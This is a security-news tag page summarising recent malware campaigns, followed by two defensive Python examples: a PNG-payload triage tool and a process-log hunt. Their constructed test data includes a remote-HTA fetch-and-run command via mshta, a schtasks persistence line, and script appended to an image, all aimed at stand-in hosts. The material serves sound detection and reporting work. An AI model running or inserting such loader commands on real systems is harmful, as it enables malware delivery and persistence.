
All news with #malware tag

810 articles · page 24 of 41

Cellik Android MaaS Builds Malicious Play Store Apps

⚠️ Cellik is a new Android malware-as-a-service advertised on underground forums that enables operators to create trojanized copies of legitimate Google Play apps. Attackers can select Play Store apps and build malicious APKs that retain the original UI, potentially helping infections remain unnoticed and, the seller claims, bypass Play Protect. The service, discovered by iVerify, is offered for $150 per month or $900 for lifetime access and includes capabilities such as screen streaming, notification interception, file exfiltration, a hidden browser mode, and an encrypted command-and-control channel.

GhostPoster: Malicious JavaScript Hidden in Firefox Add-ons

🕵️ Koi Security identified the GhostPoster campaign, which hides JavaScript inside the PNG logo images of malicious Firefox extensions that together account for more than 50,000 downloads. The dormant loader waits 48 hours, contacts hardcoded attacker domains and fetches its payload only about 10% of the time to evade detection. The decoded payload provides persistent, high-privilege access and enables affiliate hijacks, analytics injection, header stripping, CAPTCHA bypass and ad/click fraud. Users of flagged extensions should remove them and consider resetting critical account passwords.

Browser VPN Extension Found Harvesting AI Chat Data

🔒 Security researchers have found that the popular Chrome extension Urban VPN Proxy (featured in the Chrome Web Store and used by millions) contained scripts that intercepted AI chat conversations and transmitted them to company-controlled analytics servers. The functionality, introduced in version 5.5.0 on July 9, 2025, allegedly runs regardless of whether the VPN is active and cannot be disabled via settings. Koi's analysis says prompts, responses, timestamps and session identifiers were captured and compressed before exfiltration. The same capability was reportedly present in seven related extensions from the same publisher, potentially affecting more than 8 million users across Chrome and Edge.

Parked Domains Increasingly Redirect Users to Malware

🔒 Infoblox researchers found that most parked and typosquatting domains now redirect visitors to scams, scareware, or malware without any user click. The redirects are frequently conditional, benign when accessed via a VPN or non-residential IP but malicious for residential addresses, and rely on device fingerprinting, geolocation, and chains of traffic resellers. The study highlights widespread abuse of expired and lookalike domains and the growing role of affiliate networks in distributing harmful traffic.

SantaStealer info-stealer targets browsers and wallets

⚠️ Rapid7 researchers report a new malware-as-a-service called SantaStealer, advertised on Telegram and hacker forums as an in-memory info-stealer designed to evade file-based detection. The operation appears to be a rebranding of BluelineStealer by a Russian-speaking developer and is being marketed with Basic ($175/month) and Premium ($300/month) tiers. Samples and an affiliate panel show 14 modular data-collection threads that harvest browser credentials, cookies, saved cards, messaging and gaming app data, crypto wallets and documents, bundle results into ZIPs in memory, and exfiltrate them in 10MB chunks to a hardcoded C2 on port 6767. Despite claims of stealth, leaked builds include symbol names and unencrypted strings that make analysis straightforward.

Featured Chrome Extension Harvested Millions of AI Chats

🚨 A Google Chrome extension carrying a "Featured" badge, Urban VPN Proxy, has been found silently harvesting prompts and responses from major AI chat services and sending them to remote analytics servers. The extension — installed by roughly six million Chrome users and about 1.3 million Edge users — was updated on July 9, 2025 (v5.5.0) with AI capture enabled by default. Injected scripts override browser networking APIs to intercept chat data and exfiltrate conversation text, IDs, timestamps, session metadata, and model/platform information. The publisher's updated privacy policy admits collecting AI prompts and outputs for "Safe Browsing" and marketing while disclaiming a full guarantee of de-identification.

Browser Extension Risk Guide After ShadyPanda Campaign

🔒 The ShadyPanda campaign hijacked thousands of legitimate Chrome and Edge extensions, converting them into spyware and RCE-enabled backdoors via silent updates. About 4.3 million users installed compromised add‑ons that could steal session cookies and impersonate SaaS accounts. Organizations should enforce extension allow lists, audit permissions, and treat extensions like OAuth apps. Platforms such as Reco can help bridge browser, endpoint, and SaaS visibility.

Phantom Stealer Delivered via ISO Phishing in Russia

🛡️ Cybersecurity researchers have disclosed Operation MoneyMount-ISO, a phishing campaign that delivers Phantom Stealer via malicious ISO images attached inside ZIP archives targeting Russian finance, accounting, procurement, legal and payroll teams. The ISO, labeled as a bank transfer confirmation, mounts as a virtual CD and executes an embedded DLL named CreativeAI.dll to launch the stealer. Phantom harvests browser-stored crypto wallets, Discord tokens, passwords, cookies, credit cards, and can log keystrokes and monitor the clipboard. Stolen data is exfiltrated over Telegram, Discord webhooks or FTP.

Fake GitHub Repos Deliver PyStoreRAT via HTA/JS Loaders

🛡️ Researchers warn that a wave of malicious GitHub repositories is distributing a newly observed JavaScript-based RAT called PyStoreRAT, delivered via minimal Python/JS loader stubs that fetch and execute remote HTA files through mshta.exe. The deceptive projects, marketed as OSINT utilities, DeFi bots, GPT wrappers, and developer tools, often exhibit non-functional or placeholder interfaces designed to build trust. Once executed, the multi-stage implant can run EXE, DLL, PowerShell, MSI, Python, and HTA modules and deploys a follow-on information stealer, Rhadamanthys. The initial stage also checks for security products such as CrowdStrike and Cybereason to reduce visibility and establishes persistence via a scheduled task masquerading as an NVIDIA update.

Fake 'One Battle After Another' Torrent Hides Malware

🛡️ Bitdefender researchers uncovered a malicious torrent impersonating the new Paul Thomas Anderson film that hides PowerShell loaders inside subtitle files, ultimately delivering the Agent Tesla RAT. A deceptive shortcut (CD.lnk) triggers a PowerShell script embedded between specific subtitle lines to extract AES-encrypted blocks and reconstruct multiple dropper scripts. The complex chain extracts files from included images and the movie file, creates a hidden scheduled task, disables or checks Windows Defender, and loads the final payload in memory, showing a high degree of stealth and persistence.

Notepad++ 8.8.9 fixes updater flaw allowing malicious files

🛡️ Notepad++ released version 8.8.9 to address a weakness in its WinGUp updater after reports that the updater retrieved and executed malicious binaries instead of legitimate update packages. The issue surfaced in community forums where a spawned %Temp%\AutoUpdater.exe executed reconnaissance commands and exfiltrated data to a public paste service. Version 8.8.9 now enforces code-signature verification for downloaded installers and aborts updates that fail signature checks.

Malicious VSCode Marketplace Extensions Hid Trojan Campaign

🔍 ReversingLabs discovered a stealthy campaign of 19 malicious VSCode Marketplace extensions that bundled dependencies to run a trojan hidden inside a faux PNG file. The packages included modified 'path-is-absolute' or '@actions/io' modules which auto-execute code via an added class in index.js, decoding an obfuscated JavaScript dropper stored in a file named 'lock'. A fake 'banner.png' archive contained two payloads — a living-off-the-land binary 'cmstp.exe' and a Rust-based trojan — and Microsoft removed the extensions after being notified.

19 VS Code Extensions Embedding Malware in Dependencies

🔍 ReversingLabs uncovered a campaign that embedded malware in 19 Visual Studio Code extensions by tampering with bundled dependencies. Attackers replaced the widely used npm package path-is-absolute to execute a JavaScript dropper from a file named "lock" and hid two binaries inside an archive disguised as banner.png. The payloads were launched via cmstp.exe, including a process-terminating component and a Rust-based Trojan; Microsoft has been notified.
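The GhostPoster entry and the two VS Code Marketplace entries above describe the same trick from two directions: a genuine PNG that carries JavaScript outside the image data, and an archive that merely wears a .png name. The following Python triage routine is an added example, not code from Koi Security, ReversingLabs or this page. It walks the PNG chunk structure, verifies chunk CRCs, inflates zTXt text chunks, and flags bytes trailing the IEND chunk, script-like text chunks, and files whose magic bytes are not PNG at all. The sample files are constructed inline, and the JavaScript markers are a crude heuristic rather than a signature.

```python
"""Triage a file that claims to be a PNG.  Added example; not code from
Koi Security, ReversingLabs or the page.  Sample files are constructed."""
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ZIP_MAGIC = b"PK\x03\x04"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}
# Crude heuristic for JavaScript, not a signature.
JS_MARKERS = (b"function", b"eval(", b"=>", b"document.", b"fetch(")


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def minimal_png(extra_chunks=()) -> bytes:
    """A valid 1x1 grayscale PNG built from scratch (constructed sample),
    with optional ancillary chunks inserted between IHDR and IDAT."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    scanline = b"\x00\x00"  # filter byte + one 8-bit grey pixel
    png = PNG_MAGIC + _chunk(b"IHDR", ihdr)
    for ctype, data in extra_chunks:
        png += _chunk(ctype, data)
    return png + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND", b"")


def _text_payload(ctype: bytes, data: bytes) -> bytes:
    """Readable part of a text chunk; zTXt is keyword, NUL, method byte, zlib data."""
    if ctype == b"zTXt":
        keyword, _, rest = data.partition(b"\x00")
        try:
            return keyword + zlib.decompress(rest[1:])  # skip compression-method byte
        except zlib.error:
            return data
    return data  # tEXt is plain; iTXt may be compressed and is left as-is here


def triage_png(blob: bytes) -> list[str]:
    """Return a list of findings; an empty list means 'looks like a plain PNG'."""
    findings = []
    if not blob.startswith(PNG_MAGIC):
        kind = "ZIP archive with a .png name" if blob.startswith(ZIP_MAGIC) else "bad signature"
        return [f"not a PNG: {kind}"]
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc_bytes = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc_bytes) < 4:
            findings.append(f"truncated chunk {ctype!r}")
            return findings
        if struct.unpack(">I", crc_bytes)[0] != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            findings.append(f"bad CRC on {ctype!r}")
        if ctype in TEXT_CHUNKS and any(m in _text_payload(ctype, data) for m in JS_MARKERS):
            findings.append(f"script-like text in {ctype!r} chunk")
        pos += 12 + length
        if ctype == b"IEND":
            break
    trailing = blob[pos:]  # anything after IEND is not part of the image
    if trailing:
        findings.append(f"{len(trailing)} bytes after IEND")
        if any(m in trailing for m in JS_MARKERS):
            findings.append("script-like data after IEND")
    return findings


def sample_files() -> dict[str, bytes]:
    """Constructed samples, not artifacts from either campaign."""
    js = b"function run(){fetch('https://example.invalid/');}"
    return {
        "clean.png": minimal_png(),
        "logo.png": minimal_png() + js,  # loader appended after IEND
        "ztxt.png": minimal_png([(b"zTXt", b"Comment\x00\x00" + zlib.compress(b"eval(atob('x'))"))]),
        "banner.png": ZIP_MAGIC + b"\x14\x00\x00\x00\x08\x00",  # archive wearing a .png name
    }


if __name__ == "__main__":
    for name, blob in sample_files().items():
        print(name, triage_png(blob) or ["ok"])
```

Run it against an extension's unpacked directory and any finding is worth a manual look; a PNG that an image viewer renders perfectly can still fail this check, because viewers stop at IEND and ignore whatever follows.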

ThreatsDay Bulletin: Spyware, Mirai, Docker Leaks and More

🔔 This week's ThreatsDay Bulletin highlights a packed week of cross-cutting threats: a Mirai variant dubbed Broadside exploiting TBK DVRs (CVE-2024-3721), widespread exploitation of React2Shell (CVE-2025-55182), and the leak of a ValleyRAT builder that includes a signed kernel-mode rootkit. Law enforcement actions ranged from Europol's 193 arrests in a VaaS crackdown to multiple national detentions, while Apple and Google issued broad spyware alerts. Researchers flagged >10,000 Docker Hub images leaking secrets and 19 malicious VS Code extensions that used a PNG disguise to deliver trojans, underscoring persistent supply-chain and user-facing risks.

Ashen Lepus Deploys AshTag Malware Against Diplomats

🔐 Unit 42 details activity by Hamas-affiliated Ashen Lepus using a new modular .NET suite named AshTag, alongside custom loaders and revised C2 techniques to evade detection. The actors targeted Arabic-speaking government and diplomatic entities across the Middle East, delivering malware via RAR archives, DLL sideloading, and payloads hidden in benign HTML. Operators improved encryption and domain masquerading and performed hands-on exfiltration using Rclone. Organizations should monitor the provided IOCs and strengthen EDR and egress controls.

WIRTE Uses AshenLoader Sideloading to Deploy AshTag

🔒 WIRTE (tracked as Ashen Lepus by Palo Alto Networks) has been observed using benign binaries to sideload a malicious DLL named AshenLoader, which drops additional components to deploy the AshTag .NET backdoor. The intrusion chain begins with a decoy PDF and a RAR archive from file-sharing services, leading to in-memory execution of a stager to minimize forensic traces. Targets are primarily government and diplomatic entities in the Middle East, with recent expansion to Oman and Morocco. Operators have been observed staging diplomacy-related documents and exfiltrating them using Rclone.

DroidLock Android Malware Locks Devices, Demands Ransom

🔒 Zimperium researchers uncovered a new Android malware family called DroidLock that locks victims’ screens, steals messages and call data, and can remotely control devices via VNC. The threat targets Spanish-speaking users and is distributed through malicious websites that impersonate legitimate apps and deliver a dropper which installs a secondary payload. The payload requests Device Admin and Accessibility privileges to perform actions such as wiping devices, changing lock credentials, recording audio, starting the camera, and placing overlays that capture lock patterns. Operators serve a ransom WebView directing victims to contact a Proton email and threaten permanent file destruction within 24 hours if unpaid.

React2Shell Exploitation Delivers Miners and Backdoors

⚠ Huntress reports widespread exploitation of the maximum-severity React Server Components flaw CVE-2025-55182, with attackers leveraging vulnerable Next.js instances to deploy cryptocurrency miners and multiple novel Linux malware families. Observed payloads include the PeerBlight backdoor, CowTunnel reverse proxy and ZinFoq post-exploitation implant, alongside droppers that fetch XMRig, Sliver C2 and Kaiji variants. Activity since early December 2025 has targeted many sectors — notably construction and entertainment — and shows signs of automated scanning and exploitation tools that sometimes deploy Linux payloads to Windows hosts. Organizations should update react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack immediately and hunt for indicators of compromise.

Malicious Blender 3D Model Files Spread Infostealer

⚠️ Researchers observed threat actors distributing the StealC V2 infostealer hidden inside free .blend files on marketplaces like CGTrader. When Blender’s Auto Run Python Scripts setting is enabled, opening these models executes embedded Python that fetches a loader via Cloudflare Workers and runs a PowerShell chain to deploy payloads. The campaign exfiltrated browser and wallet data and abused a UAC bypass. Disable autorun and restrict unvetted tools.

ClickFix Trick Drives Rise in CastleLoader Python Loaders

🛡️ Blackpoint researchers have uncovered a campaign that leverages ClickFix social engineering to trick users into running a benign-looking command via the Windows Run dialog. That single action launches a hidden conhost.exe process which fetches a small tar archive, unpacks it into AppData and runs a windowless Python interpreter. The bundled interpreter executes compiled Python bytecode that reconstructs and decrypts CastleLoader shellcode in memory, avoiding disk-based artifacts. Observed staging uses a GoogeBot user agent and familiar /service/download/ paths, linking the activity to the CastleLoader family.
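The PyStoreRAT entry (mshta.exe fetching a remote HTA, a scheduled task named like an NVIDIA update) and the CastleLoader entry (conhost.exe launching a windowless Python interpreter from AppData) both come down to process-creation telemetry. The hunt below is an added example, not code from Blackpoint, from the researchers cited for PyStoreRAT, or from this page: one rule per pattern, run over constructed JSON process events. The event schema (pid, image, cmdline, parent_image) is made up for the example, the assumption that the windowless interpreter is pythonw.exe or python.exe is mine, and the "NVIDIA task whose action lives outside Program Files" heuristic is written for this example rather than taken from the report.

```python
"""Hunt constructed Windows process-creation events for the loader patterns
described above.  Added example; the event schema and samples are made up."""
import json
import ntpath
import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)
TASK_TARGET_RE = re.compile(r'/tr\s+"([^"]+)"', re.IGNORECASE)
INTERPRETERS = {"pythonw.exe", "python.exe"}  # assumption: the windowless interpreter is CPython


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def rule_remote_hta(ev: dict) -> bool:
    """mshta.exe handed a URL: fetch-and-run of a remote HTA, as in the PyStoreRAT loaders."""
    return _base(ev["image"]) == "mshta.exe" and bool(URL_RE.search(ev["cmdline"]))


def rule_appdata_interpreter(ev: dict) -> bool:
    """Python interpreter living under AppData and spawned by conhost.exe (CastleLoader chain)."""
    return (_base(ev["image"]) in INTERPRETERS
            and "\\appdata\\" in ev["image"].lower()
            and _base(ev["parent_image"]) == "conhost.exe")


def rule_masquerading_task(ev: dict) -> bool:
    """schtasks /create of an 'NVIDIA'-named task whose action is outside
    Program Files.  Heuristic written for this example, not from the report."""
    if _base(ev["image"]) != "schtasks.exe":
        return False
    cmd = ev["cmdline"].lower()
    if "/create" not in cmd or "nvidia" not in cmd:
        return False
    m = TASK_TARGET_RE.search(ev["cmdline"])
    target = m.group(1).lower() if m else ""
    return not target.startswith("c:\\program files")


RULES = {
    "remote_hta": rule_remote_hta,
    "appdata_interpreter_from_conhost": rule_appdata_interpreter,
    "masquerading_nvidia_task": rule_masquerading_task,
}


def hunt(log_lines) -> list[tuple[int, str]]:
    """(pid, rule name) for every JSON event that trips a rule, in log order."""
    hits = []
    for line in log_lines:
        ev = json.loads(line)
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((ev["pid"], name))
    return hits


# Constructed sample log (JSON lines); not real telemetry.
SAMPLE_LOG = [json.dumps(ev) for ev in [
    {"pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://cdn.example.invalid/update.hta",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Python\python.exe"},
    {"pid": 4188, "image": r"C:\Windows\System32\mshta.exe",  # local HTA: not this rule
     "cmdline": r"mshta.exe C:\ProgramData\setup.hta",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 5210, "image": r"C:\Users\dev\AppData\Roaming\svc\pythonw.exe",
     "cmdline": "pythonw.exe stage.pyc",
     "parent_image": r"C:\Windows\System32\conhost.exe"},
    {"pid": 5300, "image": r"C:\Users\dev\AppData\Local\Programs\Python\python.exe",  # developer's own Python
     "cmdline": "python.exe build.py",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 6001, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "NVIDIA Update" /tr "C:\Users\dev\AppData\Roaming\nv\upd.exe" /sc minute /mo 15',
     "parent_image": r"C:\Windows\System32\wscript.exe"},
    {"pid": 6002, "image": r"C:\Windows\System32\schtasks.exe",  # the real thing lives in Program Files
     "cmdline": r'schtasks /create /tn "NvTmRep" /tr "C:\Program Files\NVIDIA Corporation\Update\nvtmrep.exe" /sc daily',
     "parent_image": r"C:\Windows\System32\msiexec.exe"},
]]

if __name__ == "__main__":
    for pid, rule in hunt(SAMPLE_LOG):
        print(f"pid {pid}: {rule}")
```

The two negative samples matter as much as the hits: a developer's Python under AppData\Local\Programs is normal, so the interpreter rule keys on the conhost.exe parent rather than the path alone, and a task registered by a real driver installer is distinguished by where its action lives, not by the word NVIDIA.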